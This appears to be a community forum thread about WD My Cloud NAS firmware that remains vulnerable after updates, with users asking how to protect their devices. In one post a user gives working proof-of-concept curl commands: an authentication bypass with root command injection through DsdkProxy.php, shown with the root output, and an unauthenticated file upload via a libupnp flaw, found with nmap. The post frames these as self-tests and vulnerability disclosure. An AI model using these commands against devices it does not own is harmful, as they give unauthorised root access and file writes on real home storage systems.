Latest firmware still vulnerable

So, at the moment it’s not a major problem. Just make sure the computers are maintained correctly and the users educated. Not much to be worried about? I don’t use the DMZ on the router and just forward the needed ports.

Can you explain what you mean by “maintained correctly”?

Is this issue still a problem now? Is there a good summary of what to do?

Turning it off the only real solution?

Since WD haven’t identified which vulnerabilities they have fixed in the latest firmware, and which they haven’t, it’s really hard to say what is the best thing to do.

Not to mention the SambaCry vulnerability that has recently been identified, and been shown to be the basis of active attacks on systems running Samba. Other NAS vendors have released patched firmware to plug this vulnerability. WD have not.

I currently have my device with cloud access disabled.

I can only see the NAS being hit if a computer on the LAN spreads the worm to the NAS. If the SMB ports ate not forwarded to the Internet then the worm on the Internet will not be able to find the Samba service on the NAS on the LAN.

As long as you keep your LAN environment clean then it should not be a problem.

How do we get Twonky media to understand playlists made in iTunes?

Wrong thread. Not related to the firmware vulnerability issues being discussed in this topic. Suggest you either use the forum search feature, magnifying glass icon upper right, to see if your question has already been discussed. Or start a new discussion topic.

For example see the past discussions on iTunes Playlists and the My Cloud:

Also see the unofficial Twonky FAQ at this link:

1 Like

Thanks for the answer. I thought that the instruction was the disabling cloud access is not enough. If it the WD is on the network it is vulnerable.

Can we get a Best Practices guide together?

I don’t know; I’m not a white hat security researcher. And, as I said, WD have not identified which of the nearly 100 vulnerabilites recently reported that they think they have fixed, and I’ve not seen any reports of white hats doing re-tests.

Best Practice guide? Sorry, I can’t help with that.

1 Like

Is there any more progress with this?
Or more information somewhere else?

I became aware of the issues here:

Who knows? WD aren’t telling us anything about what they’ve done to fix the raft of vulnerabilities identified.

There has been a firmware upgrade, but it gives no details of what specific CVE issues have been addressed.

WD really don’t seem to take security seriously; certainly not when communicating with customers about security concerns.

That article is from March 7th. WD released new firmware in April that was supposed to address “critical security vulnerabilities”.

Unless those organizations that reported (or someone on their own) the security vulnerabilities back in March retest the My Cloud units with the updated firmware to see if the holes have been patched we won’t know if they’ve really been patched.

1 Like

Please. How downgrade fw. wd my cloud to 04.05.00-101.
After upgrading to the latest version, my hard drive does not sleep. Only a short time and he awakens in inactivity.

If one uses the forum search feature (magnifying glass icon upper right) they’ll find several past discussions on how to downgrade the single bay My Cloud to an earlier firmware version. Note however that downgrading to earlier firmware may increase the My Cloud vulnerability since it won’t have newer fixes or patches, the subject of this current discussion. Here is one such discussion on how to downgrade:

This issue isn’t really related to the subject of this discussion on the firmware being vulnerable to certain hacks. Again, use the forum search feature and search for “sleep” and you’ll find numerous discussions on how to try and deal with the single bay My Cloud when it doesn’t go into sleep mode. For example:

Thank you for answer. I’ll read.

FWIW the latest firmware update for the MyCloud Mirror 1st Gen currently says:

Resolved critical security vulnerabilities that potentially allowed unauthorized file deletion, unauthorized command execution and authentication bypass.

-> New Release - My Cloud Mirror Firmware Release 2.11.169 (01/12/18)

However there is still at least one vulnerability described in:

which exists in / affects the newest 2.11.168 firmware of the MyCloud Mirror 1st Gen. Maybe other Models / Generations are affected as well, you can easily test this on your own with a Linux based system and two simple curl calls showing the authentication bypass:

curl -i "http://IP/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1"
curl -i "http://IP/web/dsdk/DsdkProxy.php" --data "';id;'" --cookie "isAdmin=1;username=admin"

Just replace the admin in “username=admin” with a valid user and you’re getting the following response:

HTTP/1.1 200 OK
Date: Thu, 30 Nov 2017 12:39:20 GMT
Server: Apache
X-Powered-By: PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: application/json
Content-Language: en

<br />
<b>Warning</b>:  http_response_code() expects parameter 1 to be long, string given in <b>/usr/local/modules/web/pages/dsdk/DsdkProxy.php</b> on line <b>48</b><br />
uid=0(root) gid=0(root) groups=0(root)
sh: : Permission denied

which means that you’re again able to run arbitrary commands on the system as root.


At least the WD MyCloud Mirror 1st Generation with the latest firmware 2.11.168 (11/28/17) is vulnerable to the CVE-2016-6255 in libupnp listed here as well:

This can be simple checked with the following steps to upload a file to the target device:

  1. Scan for the UPnP TCP port of the device:

nmap -p 49000-49999 IP

  1. Verify that the file doesn’t exist yet:

curl -i http://IP:49154/test123

(Use the previously found port)

  1. Upload a new file:

curl -i --data "uploadtest" http://IP:49154/test123

  1. Verify that the file exists:

curl -i http://IP:49154/test123


I would love to submit this to as asked in some other threads but i’m not able to create an account there since a few days. It just says “registration failed” after submitting the registration form without giving ANY information why it failed.

If some one here has an account please go ahead and submit it.


It seems the second vulnerability is even known since more then a year:

this topic disscus the vulnerability for the MyCloud and not for My Cloud Mirror. These are different products, so they may have different update contents/software

That’s because this is the MyCloud forum, and NOT the Mirror forum…

And the firmware really isn’t very different, especially in the gen2/v2 version.

Exactly, that’s why i had pointed out in my initial post that my observations are from a MyCloud Mirror 1st Gen:

and that it might be possible that other models / generations are affected as well by those known / existing vulnerabilities:

And most stuff on the wiki page seems to have been tested on a MyCloud EX2 but the MyCloud Mirror 1st Gen was affected by all vulnerabilities as well.

As the MyCloud Mirror Changelog is containing notes about fixed vulnerabilities, where not all known are fixed as shown above this might apply for the plain MyClouds as well. Thus i assume that the Changelogs can’t be trusted fully.

So if you’re on a MyCloud (which you’re obviously are based on this forum) you can verify the two posted vulnerabilities against your device. And if the device is still vulnerable the posts are fitting here (in the “Latest firmware still vulnerable thread”) as well.

1 Like

hi there,

Regardless of whether the vulnerabilities were closed with the latest updates, I would like to summarize for myself: what are the steps to protect yourself? So I update the firmware, it is firstly and for sure.
Disabling Cloud Access was also important. But what else can / must one do? On the router? On MyCloud device? In the dashoard? Disabling UpNp as I can remember?

can we summarize :thinking: